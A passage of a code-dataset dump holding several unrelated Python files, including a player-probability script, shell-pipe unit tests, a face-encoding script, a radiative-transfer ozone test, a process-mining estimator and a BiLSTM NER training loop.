= len(dataset[(dataset['day']==0) & (dataset['time']==0)])\n p_0_1 = len(dataset[(dataset['day']==0) & (dataset['time']==1)])\n p_1_0 = len(dataset[(dataset['day']==1) & (dataset['time']==0)])\n p_1_1 = len(dataset[(dataset['day']==1) & (dataset['time']==1)])\n array = np.array(map(lambda x:float(x),[p_0_0,p_0_1,p_1_0,p_1_1])) / len(dataset)\n return array.tolist()\nprobability = {}\nfor player in set(player_pattern['player']):\n result = calculate(player)\n probability[player] = {(0,0):result[0],(0,1):result[1],(1,0):result[2],(1,1):result[3]}\ndef makeClass(price):\n if price >= 1100.0:\n return \"A\"\n elif price < 700:\n return \"C\"\n else:\n return \"B\"\nfield[\"class\"] = map(lambda x:makeClass(x),field['price'])\nmerged = pd.merge(player_pattern,field,on=\"location\",how=\"left\")\ndef calculateitemPercentage(items):\n output = {}\n for key in set(items):\n output[key] = 0\n for item in items:\n output[item] +=1\n for key in set(items):\n output[key] = float(output[key]) / len(items)\n return output\n###Class P\ndef calculateClassP(player):\n Class = list(merged[merged['player']==player]['class'])\n classP =calculateitemPercentage(Class)\n df = pd.DataFrame([classP.values()],columns=classP.keys())\n df.index = [player,]\n return df\nclassesP = pd.DataFrame()\nfor player in set(player_pattern['player']):\n df = calculateClassP(player)\n classesP = classesP.append(df)\nclassesP.fillna(0,inplace=True)\n#Location P\ndef calculateLocationP(player):\n Location = list(merged[merged['player']==player]['location'])\n locationP =calculateitemPercentage(Location)\n df = pd.DataFrame([locationP.values()],columns=locationP.keys())\n df.index = [player,]\n return df\nlocationP = pd.DataFrame()\nfor player in set(player_pattern['player']):\n df = calculateLocationP(player)\n locationP = locationP.append(df)\nlocationP.fillna(0,inplace=True)\n\n\n# In[2]:\n\ndef project1(Field,KM,play_count,FieldP,day,time,count):\n #calculate distance\n selected_field = field[field['location'] == Field].iloc[0]\n players_data = player_pattern[['player','home']].drop_duplicates(subset=[\"player\",\"home\"])\n players_data = pd.merge(players_data,field,left_on=\"home\",right_on=\"location\",how=\"left\")\n players_data = players_data[['player','home','longitude','latitude','location']]\n players_data['distance'] = map(lambda x:calculateDistance(selected_field,players_data.loc[x]),players_data.index)\n #selected neighbor\n players_data = players_data[players_data['distance'] <= KM]\n #calcualte total play count and filtering\n players_data[\"play_count\"] = map(lambda x:len(player_pattern[player_pattern[\"player\"] == x]),players_data['player'])\n players_data = players_data[players_data['play_count'] >= play_count]\n players_data.set_index('player',inplace=True)\n #取 X 球場打球機率 < Y\n selected_player = locationP[locationP[Field] <= FieldP].index\n players_data = players_data.loc[selected_player].dropna()\n #取球場等級\n Class = field[field['location']==Field]['class'].iloc[0]\n if Class == \"A\":\n selected_player = classesP[(classesP[\"A\"]>0) & (classesP[\"B\"]>0)].index\n elif Class == \"B\":\n selected_player = classesP.index\n elif Class == \"C\":\n selected_player = classesP[(classesP[\"B\"]>0) & (classesP[\"C\"]>0)].index\n players_data = players_data.loc[selected_player].dropna()\n #To DF\n selected_player = list(players_data.index)\n df = pd.DataFrame(selected_player,columns=['player'])\n df['probability'] = map(lambda x:probability[x][(day,time)],df['player'])\n df = df.sort_values(['probability'],ascending=False)\n df.set_index(\"player\",inplace=True)\n return df[\"probability\"][:count]\n\n\n# In[3]:\n\ndef project2(Field,KM,play_count,day,time,count):\n #calculate distance\n selected_field = field[field['location'] == Field].iloc[0]\n players_data = player_pattern[['player','home']].drop_duplicates(subset=[\"player\",\"home\"])\n players_data = pd.merge(players_data,field,left_on=\"home\",right_on=\"location\",how=\"left\")\n players_data = players_data[['player','home','longitude','latitude','location']]\n players_data['distance'] = map(lambda x:calculateDistance(selected_field,players_data.loc[x]),players_data.index)\n #selected neighbor\n players_data = players_data[players_data['distance'] <= KM]\n #calcualte total play count and filtering\n players_data[\"play_count\"] = map(lambda x:len(player_pattern[player_pattern[\"player\"] == x]),players_data['player'])\n players_data = players_data[players_data['play_count'] >= play_count]\n players_data.set_index('player',inplace=True)\n #取球場等級\n Class = field[field['location']==Field]['class'].iloc[0]\n if Class == \"A\":\n selected_player = classesP[(classesP[\"A\"]>0) & (classesP[\"B\"]>0)].index\n elif Class == \"B\":\n selected_player = classesP.index\n elif Class == \"C\":\n selected_player = classesP[(classesP[\"B\"]>0) & (classesP[\"C\"]>0)].index\n players_data = players_data.loc[selected_player].dropna()\n #To DF\n selected_player = list(players_data.index)\n df = pd.DataFrame(selected_player,columns=['player'])\n df['probability'] = map(lambda x:probability[x][(day,time)],df['player'])\n df = df.sort_values(['probability'],ascending=False)\n df.set_index(\"player\",inplace=True)\n return df[\"probability\"][:count]\n\n\n# In[4]:\n\ndef calculateFarP(player,KM2):\n player = player_pattern[player_pattern[\"player\"]==player]\n merged = pd.merge(player,field,on=\"location\",how=\"left\")\n merged = merged[['player','home','longitude','latitude']]\n home = field[field['location']==list(set(merged['home']))[0]].iloc[0]\n merged['distance'] = map(lambda x:calculateDistance(home,merged.loc[x]),merged.index)\n merged['bigger'] = merged['distance'] >= KM2\n try:\n return calculateitemPercentage(merged['bigger'])[True]\n except KeyError:\n return 0.0\n\ndef project3(Field,KM,play_count,KM2,farP,day,time,count):\n #calculate distance\n selected_field = field[field['location'] == Field].iloc[0]\n players_data = player_pattern[['player','home']].drop_duplicates(subset=[\"player\",\"home\"])\n players_data = pd.merge(players_data,field,left_on=\"home\",right_on=\"location\",how=\"left\")\n players_data = players_data[['player','home','longitude','latitude','location']]\n players_data['distance'] = map(lambda x:calculateDistance(selected_field,players_data.loc[x]),players_data.index)\n #selected not neighbor\n players_data = players_data[players_data['distance'] >= KM]\n #calcualte total play count and filtering\n players_data[\"play_count\"] = map(lambda x:len(player_pattern[player_pattern[\"player\"] == x]),players_data['player'])\n players_data = players_data[players_data['play_count'] >= play_count]\n ##去 X 公里以外的機率 > Y\n players_data[\"farP\"] = map(lambda x:calculateFarP(x,KM2),players_data['player'])\n players_data = players_data[players_data['farP'] >= farP]\n players_data.set_index('player',inplace=True)\n #取球場等級\n Class = field[field['location']==Field]['class'].iloc[0]\n if Class == \"A\":\n selected_player = classesP[(classesP[\"A\"]>0) & (classesP[\"B\"]>0)].index\n elif Class == \"B\":\n selected_player = classesP.index\n elif Class == \"C\":\n selected_player = classesP[(classesP[\"B\"]>0) & (classesP[\"C\"]>0)].index\n players_data = players_data.loc[selected_player].dropna()\n #To DF\n selected_player = list(players_data.index)\n df = pd.DataFrame(selected_player,columns=['player'])\n df['probability'] = map(lambda x:probability[x][(day,time)],df['player'])\n df = df.sort_values(['probability'],ascending=False)\n df.set_index(\"player\",inplace=True)\n return df[\"probability\"][:count]\n\n\n","sub_path":"apply2.py","file_name":"apply2.py","file_ext":"py","file_size_in_byte":8498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"141554219","text":"# encoding: utf-8\nimport sys\nimport os\nimport unittest\nimport inspect\n\ntest_dir = os.path.abspath(os.path.dirname(__file__))\nsys.path.insert(0, os.path.abspath(os.path.join(test_dir, '..')))\n\n\nclass PipesTest(unittest.TestCase):\n\n def setUp(self):\n from shpipes import Commands\n\n os.environ['PATH'] = os.path.join(test_dir, 'bin') + ':' + os.environ['PATH']\n self.shell = Commands()\n\n def test_path(self):\n attrs = dir(self.shell)\n self.assertIn('wc_py', attrs)\n self.assertIn('eval_py', attrs)\n self.assertIn('grep_py', attrs)\n self.assertIn('massedit_py', attrs)\n self.assertNotIn('noexecfile', attrs)\n\n def test_math(self):\n echo = self.shell.echo_py('1+3*4')\n cmd = echo | self.shell.eval_py()\n self.assertEqual('13\\n', cmd.getvalue())\n cmd = echo | self.shell.eval_py() | self.shell.wc_py()\n self.assertEqual('1\\t1\\t3\\n', cmd.getvalue())\n\n def test_python(self):\n from shpipes import Pipe\n\n py_pipe = Pipe(sys.executable)\n cmd = py_pipe('-c \"import sys; print(sys.executable)\"')\n self.assertEqual(sys.executable + '\\n', cmd.getvalue())\n cmd = py_pipe(sys.executable)('--version')\n version = '%d.%d.%d' % (sys.version_info[0], sys.version_info[1], sys.version_info[2])\n self.assertIn(version, cmd.getvalue())\n\n def test_grep(self):\n cmd = self.shell.grep_py('.+foobarbaz', __file__)\n self.assertEqual(inspect.stack(2)[0].code_context[0], cmd.getvalue())\n\n def test_args(self):\n cmd = self.shell.echo_py('4**4')\n cmd = self.shell.eval_py(cmd.getvalue())\n self.assertEqual('256\\n', cmd.getvalue())\n cmd = self.shell.eval_py(self.shell.echo_py('4**4'))\n self.assertEqual('256\\n', cmd.getvalue())\n\n def test_bin(self):\n cmd = self.shell.echo_py('\"\\xff\\xff\"')\n self.assertEqual('ÿÿ\\n', cmd.getvalue())\n\n\nif __name__ == '__main__':\n unittest.main()\n # self.shell.massedit_py('-e', '''re.sub(r\"^class\", \"classy\", line)''')\n\n#\n# cmd = cmds.find('. -type f')\n# cmd |= cmds.grep(__file__)\n# print(cmds.wc(cmd).getvalue())\n#\n# print(cmd.getvalue())\n#\n# cmd = cmds.echo(\"750/12.5\") | cmds.bc() | cmds.sed(\"'s/$/\\/24/'\") | cmds.bc()\n# print(cmd.getvalue())\n#\n# cmd = Pipe(sys.executable)('-c \"import sys; print(sys.version)\"')\n# print(cmd.getvalue())\n#\n# cmd = cmds.grep('fizzbuzz', __file__)\n# print('G', cmd.getvalue())\n#\n# cmd = cmds.ps('-u $USER -f')\n# cmd |= cmds.grep(__file__)\n# cmd |= cmds.head('-1')\n# print(cmd.getvalue())\n","sub_path":"tests/test_pipes.py","file_name":"test_pipes.py","file_ext":"py","file_size_in_byte":2563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"277445195","text":"#This was inspired by the following articles:\n#https://medium.com/@ageitgey/machine-learning-is-fun-part-4-modern-face-recognition-with-deep-learning-c3cffc121d78\n#file:///Users/ryankarl/Downloads/Face%20recognition%20with%20OpenCV,%20Python,%20and%20deep%20learning%20-%20PyImageSearch.htm\n#http://blog.dlib.net/2017/02/high-quality-face-recognition-with-deep.html\n\n# python encode_faces.py --dataset dataset --encodings encodings.pickle\nfrom imutils import paths\nimport face_recognition\nimport argparse\nimport pickle\nimport cv2\nimport os\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--dataset\", required=True,\n\thelp=\"path to input directory of faces + images\")\nap.add_argument(\"-e\", \"--encodings\", required=True,\n\thelp=\"path to serialized db of facial encodings\")\nap.add_argument(\"-d\", \"--detection-method\", type=str, default=\"cnn\",\n\thelp=\"face detection model to use: either `hog` or `cnn`\")\nargs = vars(ap.parse_args())\n\n#Find path to dataset images\nprint(\"[INFO] quantifying faces...\")\nimagePaths = list(paths.list_images(args[\"dataset\"]))\n\nknownEncodings = []\nknownNames = []\n\n#Loop over the image paths\nfor (i, imagePath) in enumerate(imagePaths):\n\t#Find the name of the individual\n\tprint(\"[INFO] processing image {}/{}\".format(i + 1,\n\t\tlen(imagePaths)))\n\tname = imagePath.split(os.path.sep)[-2]\n\n\t# Convert the image from BGR to dlib RGB\n\timage = cv2.imread(imagePath)\n\trgb = cv2.cvtColor(image, cv2.COLOR_BGR2RGB)\n\n\t#Find the coordinates of the bounding boxes for each face in the input image\n\tboxes = face_recognition.face_locations(rgb,\n\t\tmodel=args[\"detection_method\"])\n\n\t#Compute the embedding for the face\n\tencodings = face_recognition.face_encodings(rgb, boxes)\n\n\t#Add each encoding and name to the set of known names and encodings\n\tfor encoding in encodings:\n\t\t\n\t\tknownEncodings.append(encoding)\n\t\tknownNames.append(name)\n\n#Save to disk\nprint(\"[INFO] serializing encodings...\")\ndata = {\"encodings\": knownEncodings, \"names\": knownNames}\nf = open(args[\"encodings\"], \"wb\")\nf.write(pickle.dumps(data))\nf.close()\n","sub_path":"encode_faces.py","file_name":"encode_faces.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"13990584","text":"\"\"\"\n610. Two Sum - Difference equals to target\nhttps://www.lintcode.com/problem/two-sum-difference-equals-to-target/description\ntwo pointer. same direction\n\"\"\"\nclass Solution:\n \"\"\"\n @param nums: an array of Integer\n @param target: an integer\n @return: [num1, num2] (num1 < num2)\n \"\"\"\n def twoSum7(self, nums, target):\n if not nums or len(nums) < 2:\n return -1, -1\n n = len(nums)\n target = abs(target)\n\n j = 0\n for i in range(n):\n j = max(j, i + 1)\n while j < n and nums[j] - nums[i] < target:\n j += 1\n if j >= n:\n break\n if nums[j] - nums[i] == target:\n return nums[i], nums[j]\n\n return -1, -1\n","sub_path":"lintcode/610.1.py","file_name":"610.1.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"116953521","text":"#!/usr/bin/env python3\n\n\"\"\"\n Does some simple calculations to test trace gas PACE calculations\n\n Adapted from benchmark4Amir.py\n Patricia Castellanos, April 2020\n\n\"\"\"\n\nimport os\nimport sys\nfrom netCDF4 import Dataset\nfrom netCDF4 import Dataset as ncread\nimport numpy as np\nfrom MAPL.constants import *\nfrom py_leo_vlidort import VLIDORT_POLAR_\nfrom scipy.interpolate import interp1d\nimport scipy.integrate as integrate\nfrom pyhdf.SD import SD, SDC\nfrom multiprocessing import Pool\n\nfrom hyperTest_o3 import get_channels,get_geom,get_ROT,get_TOA_unpack,get_TOA\nfrom hyperTest_o3 import get_PTWV_profile, get_o3_profile, writenc\n\nformat = 'NETCDF4_CLASSIC'\nMISSING = -1.e+20\n\n\ndef get_kg(inFile):\n \"\"\"\n Read c-k distribution coefficients from Amir's calculations\n \"\"\"\n nc = Dataset(inFile)\n # wavelength [nm]\n wav_abs = np.array(nc.variables['wavelengths'][:])\n # c-k coefficients [not sure about units]\n kg_o2 = nc.variables['kg_o2'][:].T\n kg_h2o = nc.variables['kg_h2o'][:].T\n kg_co = nc.variables['kg_co'][:].T\n kg_co2 = nc.variables['kg_co2'][:].T\n kg_ch4 = nc.variables['kg_ch4'][:].T\n kg_n2o = nc.variables['kg_n2o'][:].T\n g_bins = nc.variables['g_bins'][:]\n\n nc.close()\n\n return kg_o2, kg_h2o, kg_co, kg_co2, kg_ch4, kg_n2o, g_bins, wav_abs\n\ndef get_alpha(A,VMR,rhoe,ze):\n \"\"\"\n Calculate Absorption optical depth profile\n A - absorption coefficient [m2/molecule]\n VMR - trace gas mixing ratio [vol/vol, dimensionless]\n rhoe - air number density [molecules/m3]\n ze - profile altitude [m]\n \"\"\"\n\n # convert vmr to molecules/m3\n nxe = VMR*rhoe\n\n # integrate to get the optical depth subcolumns\n km, nbin, nch = A.shape\n alpha = np.zeros([km,nbin,nch])\n for i in range(km):\n for b in range(nbin):\n c1 = A[i,b,:]*nxe[i]\n c2 = A[i,b,:]*nxe[i+1]\n c1.shape = (1, nch)\n c2.shape = (1, nch)\n c = np.append(c1,c2,axis=0)\n alpha[i,b,:] = np.trapz(c,ze[i:i+2],axis=0)\n\n #alpha = np.trapz(A*nxe,ze)\n\n return alpha\n\ndef get_abs_o3_ck(inFile,te):\n \"\"\"\n get o3 xsection \n use values interpolated to ck-bins\n interpolate to temp profile te\n units m2/molecule\n \"\"\"\n # ck interpolated xsec\n nc = Dataset(inFile)\n xsec_ck = nc.variables['xsec_o3_ck'][:]\n temp = nc.variables['temp'][:]\n nc.close()\n\n # get xsecstion for te temperature profile\n xsec_f = interp1d(temp,xsec_ck,kind='linear',fill_value='extrapolate')\n\n # dimensions ke,nwav\n xsec_int = xsec_f(te).T\n\n # convert from cm2/molecule to m2/molecule\n xsec_int = xsec_int*1e-4\n\n return xsec_int\n\ndef get_abs_o3_rsr(inFile,te):\n \"\"\"\n get o3 xsection\n use values that are RSR weighted\n interpolate to temp profile te\n units m2/molecule\n \"\"\"\n # rsr weighted xsec\n nc = Dataset(inFile)\n wav_rsr = np.array(nc.variables['wav_oci'][:])\n xsec_rsr = nc.variables['xsec_o3_rsr'][:]\n temp = nc.variables['temp'][:]\n nc.close()\n\n # get xsecstion for te temperature profile\n xsec_f = interp1d(temp,xsec_rsr,kind='linear',fill_value='extrapolate')\n\n # dimensions ke,nwav\n xsec_int = xsec_f(te).T\n\n # convert from cm2/molecule to m2/molecule\n xsec_int = xsec_int*1e-4\n\n return wav_rsr,xsec_int\n#------------------------------------ M A I N ------------------------------------\n\nif __name__ == \"__main__\":\n\n outRoot = 'hyperTest/'\n outFile = '{}/outputs/hyperTest_CK_Thuillier_o3.nc4'.format(outRoot)\n\n # Pressure [Pa], temperature [K], height [m], water vapor [ppm] profile - standard atmosphere\n # used to make OCI look up tables\n inFile = '{}/atrem_tpvmr.nc'.format(outRoot)\n km, pe, te, ze, rhoe, h2oe, DP = get_PTWV_profile(inFile)\n\n # Read in Amir's c-k distribution coefficients wavelengths\n # kg has dimensions km,ngbins,nwav. ngbins = 10\n inFile = 'correlated_k/kg_gas.nc'\n kg_o2, kg_h2o, kg_co, kg_co2, kg_ch4, kg_n2o, g_bins, wav_abs = get_kg(inFile)\n ngbin = len(g_bins)\n\n # convert kg from pressure space to z space\n # ---------------------------------------------------\n Q = 2.15199993E+25\n C = (Q*28.966) / 6.0225e23 / 1e-6\n\n # integrate air density in each layer\n rhoint = np.zeros(km)\n for i in range(km):\n rhoint[i] = np.trapz(rhoe[i:i+2],ze[i:i+2])\n\n DP.shape = (km,1,1)\n rhoint.shape = (km,1,1) \n\n for ibin in range(ngbin-1):\n DP = np.append(DP,DP[:,0:1,:],axis=1)\n rhoint = np.append(rhoint,rhoint[:,0:1,:],axis=1)\n kg_o2_z = kg_o2*C*DP/rhoint\n kg_co_z = kg_co*C*DP/rhoint\n kg_co2_z = kg_co2*C*DP/rhoint\n kg_ch4_z = kg_ch4*C*DP/rhoint\n kg_n2o_z = kg_n2o*C*DP/rhoint\n kg_h2o_z = kg_h2o*C*DP/rhoint\n\n # get absorption optical depth with new aborption coefficient\n co_vmr = 0.1*1e-6\n alpha_co = get_alpha(kg_co_z,co_vmr,rhoe,ze)\n \n o2_vmr = 0.21\n alpha_o2 = get_alpha(kg_o2_z,o2_vmr,rhoe,ze)\n\n co2_vmr = 400.*1.0E-06\n alpha_co2 = get_alpha(kg_co2_z,co2_vmr,rhoe,ze)\n\n ch4_vmr = 1.8*1.0E-06\n alpha_ch4 = get_alpha(kg_ch4_z,ch4_vmr,rhoe,ze)\n\n n2o_vmr = 0.3*1.0E-06\n alpha_n2o = get_alpha(kg_n2o_z,n2o_vmr,rhoe,ze)\n\n \n # scale water vapor so total precipitable water \n # is equal to 1 cm\n # ----------------\n\n # first calculate water vapor column [molecules/m2]\n h2ocol = np.trapz(h2oe*1e-6*rhoe,ze)\n # normalize profile so water vapor column expressed as total precipitable water is equal to 1 cm \n # use 1 mm of rainfall = 1 kg/m2\n # or 1 cm = 10 kg/m2\n # 10 kg/m2 is equal to 3.34e22 water molecules/cm2\n h2ocolnew = 3.34e22\n # convert to meters\n h2ocolnew = h2ocolnew*1e4\n \n h2oenew = h2oe*(h2ocolnew/h2ocol)\n # get in vmr units\n h2oe_vmr = 1e-6*h2oenew\n alpha_h2o = get_alpha(kg_h2o_z,h2oe_vmr,rhoe,ze)\n\n # add up all the alphas\n alpha = alpha_h2o + alpha_n2o + alpha_ch4 + alpha_co2 + alpha_o2 + alpha_co\n\n # ----\n # OZONE Stuff\n # ---\n # Read in mcclams ozone mixing ratio profile [unitless]\n inFile = '{}/mcclams.dat'.format(outRoot)\n z_o3, o3_vmr = get_o3_profile(inFile)\n\n # interpolate o3_vmr to PT profile\n o3_f = interp1d(z_o3,o3_vmr,kind='linear',fill_value=\"extrapolate\")\n o3_vmre = o3_f(ze)\n\n # Read in ozone cross sections\n # use xsecs interpolated to CK bins\n # also interpolated to te profile\n inFile = '{}/o3_bremen/xsec_o3_ck_bins_V0.nc'.format(outRoot)\n abs_o3_z = get_abs_o3_ck(inFile,te)\n \n # integrate conc_o3*xsec_o3 to get o3 alpha\n nwav = len(wav_abs)\n alpha_o3 = np.zeros([km,nwav])\n for i in range(km):\n o3_conc = o3_vmre[i:i+2]*rhoe[i:i+2]\n o3_conc.shape = (2,1)\n alpha_o3[i,:] = np.trapz(o3_conc*abs_o3_z[i:i+2,:],ze[i:i+2],axis=0)\n \n sys.exit()\n # add ozone to total alpha\n # extend array down to uv\n for ibin in range(ngbin):\n alpha[:,ibin,:] = alpha[:,ibin,:] + alpha_o3\n all_wl = wav_abs\n\n # flip everything vertically so going from top of atmosphere to surface\n pe = pe[-1::-1]\n te = te[-1::-1]\n ze = ze[-1::-1]\n alpha = alpha[-1::-1,:,:]\n\n # add dimension to be in km+1,nobs\n pe.shape = (km+1,1)\n te.shape = (km+1,1)\n ze.shape = (km+1,1)\n\n\n # read in granule geometry\n Iscan = 600\n Icross = 1000\n SZA,VZA,RAA,SAA,VAA = get_geom(Iscan,Icross)\n\n \n # Read in solar irradiance spectrum\n # second dim = wavelength, irradiance\n # units=nm, uW/cm^2/nm\n inFile = '{}/Thuillier_F0.npy'.format(outRoot)\n F0 = np.load(inFile) \n # interpolate to c-k wavelength bins\n F0_f = interp1d(F0[:,0],F0[:,1],kind='linear',fill_value=\"extrapolate\")\n F0_int = F0_f(all_wl)\n\n # set up some vlidort stuff\n albedoType = 'OCIGissCX'\n U10m = np.array([3.0])\n V10m = np.array([4.0])\n mr = 1.334\n nstreams = 12\n\n # loop through channels\n nproc = 20\n nwl = len(all_wl)\n# nwl = 2\n\n args = []\n ROD = []\n depol = []\n for ich in np.arange(nwl):\n ch = all_wl[ich]\n\n # Get Rayleigh\n ROT, depol_ratio = get_ROT(ch,pe,te,ze,verbose=False) \n ROD.append(np.squeeze(ROT.sum(axis=0)))\n depol.append(depol_ratio)\n\n for ibin in range(ngbin-1):\n ROT = np.append(ROT,ROT[:,:,0:1],axis=2)\n depol_ratio = np.append(depol_ratio,depol_ratio[0:1])\n \n # trace gas\n alpha_ch = alpha[:,:,ich]\n alpha_ch.shape = (km,1,ngbin)\n\n # AOP vectors [km,nch,nobs]\n tau = np.zeros([km,ngbin,1])\n ssa = np.zeros([km,ngbin,1])\n pmom = np.zeros([km,ngbin,1,30,6])\n \n # water refractive index\n mr_in = np.ones(ngbin)\n mr_in = mr_in*mr\n\n # solar irradiance\n F0_in = F0_int[ich]\n F0_in = np.repeat(F0_in,ngbin)\n F0_in.shape = (ngbin,1)\n\n ch = np.repeat(ch,ngbin)\n args.append([ch,\n F0_in,\n ROT,depol_ratio,\n tau,ssa,pmom,\n alpha_ch,\n SZA,VZA,RAA,\n km,pe,te,ze,\n nstreams,\n albedoType,\n U10m,V10m,mr_in,\n False])\n\n# I,reflectance,BR = get_TOA(ch,\n# ROT,depol_ratio,\n# tau,ssa,pmom,\n# alpha_ch,\n# SZA,VZA,RAA,\n# km,pe,te,ze,\n# nstreams,\n# albedoType,\n# U10m=U10m,V10m=V10m,mr=np.array([1.334]),\n# verbose=False)\n\n\n\n # use multiprocessing\n p = Pool(nproc)\n result = p.map(get_TOA_unpack,args)\n I = []\n reflectance = []\n BR = []\n for r in result: \n I_r,reflectance_r,BR_r = r\n I.append(np.squeeze(I_r))\n reflectance.append(np.squeeze(reflectance_r))\n BR.append(np.squeeze(BR_r))\n\n p.close()\n p.join()\n \n # convert to arrays with dimensions nwav,ngbin\n ROD = np.array(ROD) \n depol_ratio = np.array(depol)\n\n I = np.array(I)\n reflectance = np.array(reflectance)\n BR = np.array(BR)\n \n alphaD = alpha.sum(axis=0).T \n\n\n # integrate with g weights to get effective reflectance at each wavelength\n I_eff = np.trapz(I,g_bins,axis=1)\n reflectance_eff = np.trapz(reflectance,g_bins,axis=1)\n BR_eff = np.trapz(BR,g_bins,axis=1)\n alphaD_eff = np.trapz(alphaD,g_bins,axis=1)\n\n # write to outFile\n writenc(outFile,all_wl,\n F0_int,\n SZA,SAA,VZA,VAA,\n I_eff,BR_eff,reflectance_eff,\n ROD,depol_ratio,\n alphaD_eff,\n pe,te,ze,\n U10m,V10m,mr) \n#\n\n","sub_path":"src/Components/missions/PACE/hyperTest_ck_o3_bremen.py","file_name":"hyperTest_ck_o3_bremen.py","file_ext":"py","file_size_in_byte":10889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"188539830","text":"import os\nimport pandas as pd\nimport datetime\nimport numpy as np\nimport math\nfrom sklearn.cluster import KMeans\n\n# Method for transforming events into horizontal format.\ndef transform_event_data(df):\n case = None\n data = {}\n for index, row in df.iterrows():\n if case != row['case concept:name']:\n case = row['case concept:name']\n if case not in data.keys():\n data[case] = []\n data[case].append(float(row['event concept:name']))\n df = pd.DataFrame.from_dict(data, orient='index')\n return df, len(df.columns)\n\n\ndef to_seconds(x):\n return x.total_seconds()\n\n\nname = 'Road_Traffic_Fine_Management_Process'\ntest_df = pd.read_pickle(name + 'predicted.dat')\ntrain_df = pd.read_pickle(name + 'extra-columns.dat')\n\nevent_data_train, max_event = transform_event_data(train_df)\nevent_data_test, amount = transform_event_data(test_df)\n\n# Calculating means per event type per cluster for train set:\nclustering = KMeans(random_state=0)\nevent_data_train['cluster'] = clustering.fit_predict(event_data_train.fillna(0))\ntrain_df.index = train_df['case concept:name']\ntrain_df['cluster'] = event_data_train['cluster']\ntrain_means = pd.DataFrame(train_df.groupby('case concept:name')['time-to-end'].max())\ntrain_means['cluster'] = event_data_train['cluster']\n\n# Making the test set of the right event length:\nfor i in range(amount, amount + (max_event - amount), 1):\n event_data_test[i] = np.nan\n\n# Predict cluster on test set and use means per event type and per cluster as estimator:\nevent_data_test['cluster'] = clustering.predict(event_data_test.fillna(0))\ntest_df.index = test_df['case concept:name']\ntest_df['cluster'] = event_data_test['cluster']\nfor cluster in list(train_means.groupby('cluster').mean().index):\n test_df.loc[test_df['cluster'] == cluster, 'estimator2'] = float(train_means.groupby('cluster').mean().loc[cluster])\ntest_df['estimator2'] = test_df['estimator2'] - test_df['inter-event-time']\n\n# Calculate the error:\nprint(\n math.sqrt(sum((test_df['time-to-end'] - test_df['estimator2']).apply(lambda x: x ** 2)) / len(test_df)) / 3600 / 24)\n\n# Save data again:\ntest_df.to_pickle(name + 'predicted.dat')\ntrain_df.to_pickle(name + 'extra-columns.dat')\n","sub_path":"estimators.py","file_name":"estimators.py","file_ext":"py","file_size_in_byte":2223,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"252481228","text":"import glob\nimport os.path as path\n\nimport pkbar\nimport torch\n\nfrom constants import *\n\n\ndef padding(sents, pad_idx, device):\n lengths = [len(sent) for sent in sents]\n max_len = lengths[0]\n padded_data = []\n for s in sents:\n padded_data.append(s.tolist() + [pad_idx] * (max_len - len(s)))\n return torch.tensor(padded_data, device=device), lengths\n\n\ndef train_epoch(model, optimizer, criterion, train_dataset, device, probar):\n model.train()\n model = model.to(device)\n\n epoch_loss = 0\n\n for idx, (sentences, tags) in enumerate(train_dataset):\n sentences, sent_lengths = padding(sentences, model.sent_vocab.stoi[PAD], device)\n tags, _ = padding(tags, model.tag_vocab.stoi[PAD], device)\n\n optimizer.zero_grad()\n pred = model(sentences, sent_lengths)\n loss = criterion(pred.transpose(1, 2), tags)\n\n loss.backward()\n torch.nn.utils.clip_grad_norm_(model.parameters(), max_norm=5.0)\n optimizer.step()\n\n probar.update(idx, values=[('loss', loss),])\n\n epoch_loss += loss.item()\n return epoch_loss / len(train_dataset)\n\ndef evaluate(model, criterion, val_dataset, device):\n model.eval()\n model = model.to(device)\n\n losses = 0\n\n for idx, (sentences, tags) in enumerate(val_dataset):\n sentences, sent_lengths = padding(sentences, model.sent_vocab.stoi[PAD], device)\n tags, _ = padding(tags, model.tag_vocab.stoi[PAD], device)\n\n pred = model(sentences, sent_lengths)\n loss = criterion(pred.transpose(1, 2), tags)\n\n losses += loss.item()\n return losses / len(val_dataset)\n\ndef train(model, optimizer, criterion, writer, train_dataset, val_dataset, device, epochs, checkpoint_folder='./checkpoints', save_freq=1, resume=False):\n start_iter = 0\n if resume:\n model_list = glob.glob(path.join(checkpoint_folder, '*.pt'))\n if len(model_list) != 0:\n model_list.sort(reverse=True)\n start_iter = int(model_list[0].split('_')[-1].split('.')[0])\n model = model.load(path.join(checkpoint_folder, 'ulstm_ner_%s.pt' % start_iter))\n\n batch_per_epoch = len(train_dataset)\n for epoch in range(start_iter+1, epochs+1):\n probar = pkbar.Kbar(target=batch_per_epoch, epoch=epoch-1, num_epochs=epochs, width=30, always_stateful=False)\n train_loss = train_epoch(model, optimizer, criterion, train_dataset, device, probar)\n val_loss = evaluate(model, criterion, val_dataset, device)\n\n probar.add(1, values=[('train_loss', train_loss), ('val_loss', val_loss),])\n writer.add_scalar('training loss',\n train_loss,\n epoch * len(train_dataset) + batch_per_epoch)\n writer.add_scalar('validation loss',\n val_loss,\n epoch * len(val_dataset) + batch_per_epoch)\n if epoch % save_freq == 0:\n model.save(path.join(checkpoint_folder, 'ulstm_ner_%s.pt' % epoch))\n","sub_path":"bi_lstm/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2992,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"501646533","text":"#\n# Copyright (c) 2014, Prometheus Research, LLC\n#\n\n\nfrom rex.core import Extension\n\nfrom ..mixins import Comparable, Displayable, Dictable\nfrom ..util import to_unicode, get_implementation\n\n\n__all__ = (\n 'Channel',\n)\n\n\nclass Channel(Extension, Comparable, Displayable, Dictable):\n \"\"\"\n Represents an Electronic Data Capture system for which a Presentation\n configuration can be defined.\n \"\"\"\n\n PRESENTATION_TYPE_FORM = 'form'\n PRESENTATION_TYPE_SMS = 'sms'\n ALL_PRESENTATION_TYPES = (\n PRESENTATION_TYPE_FORM,\n 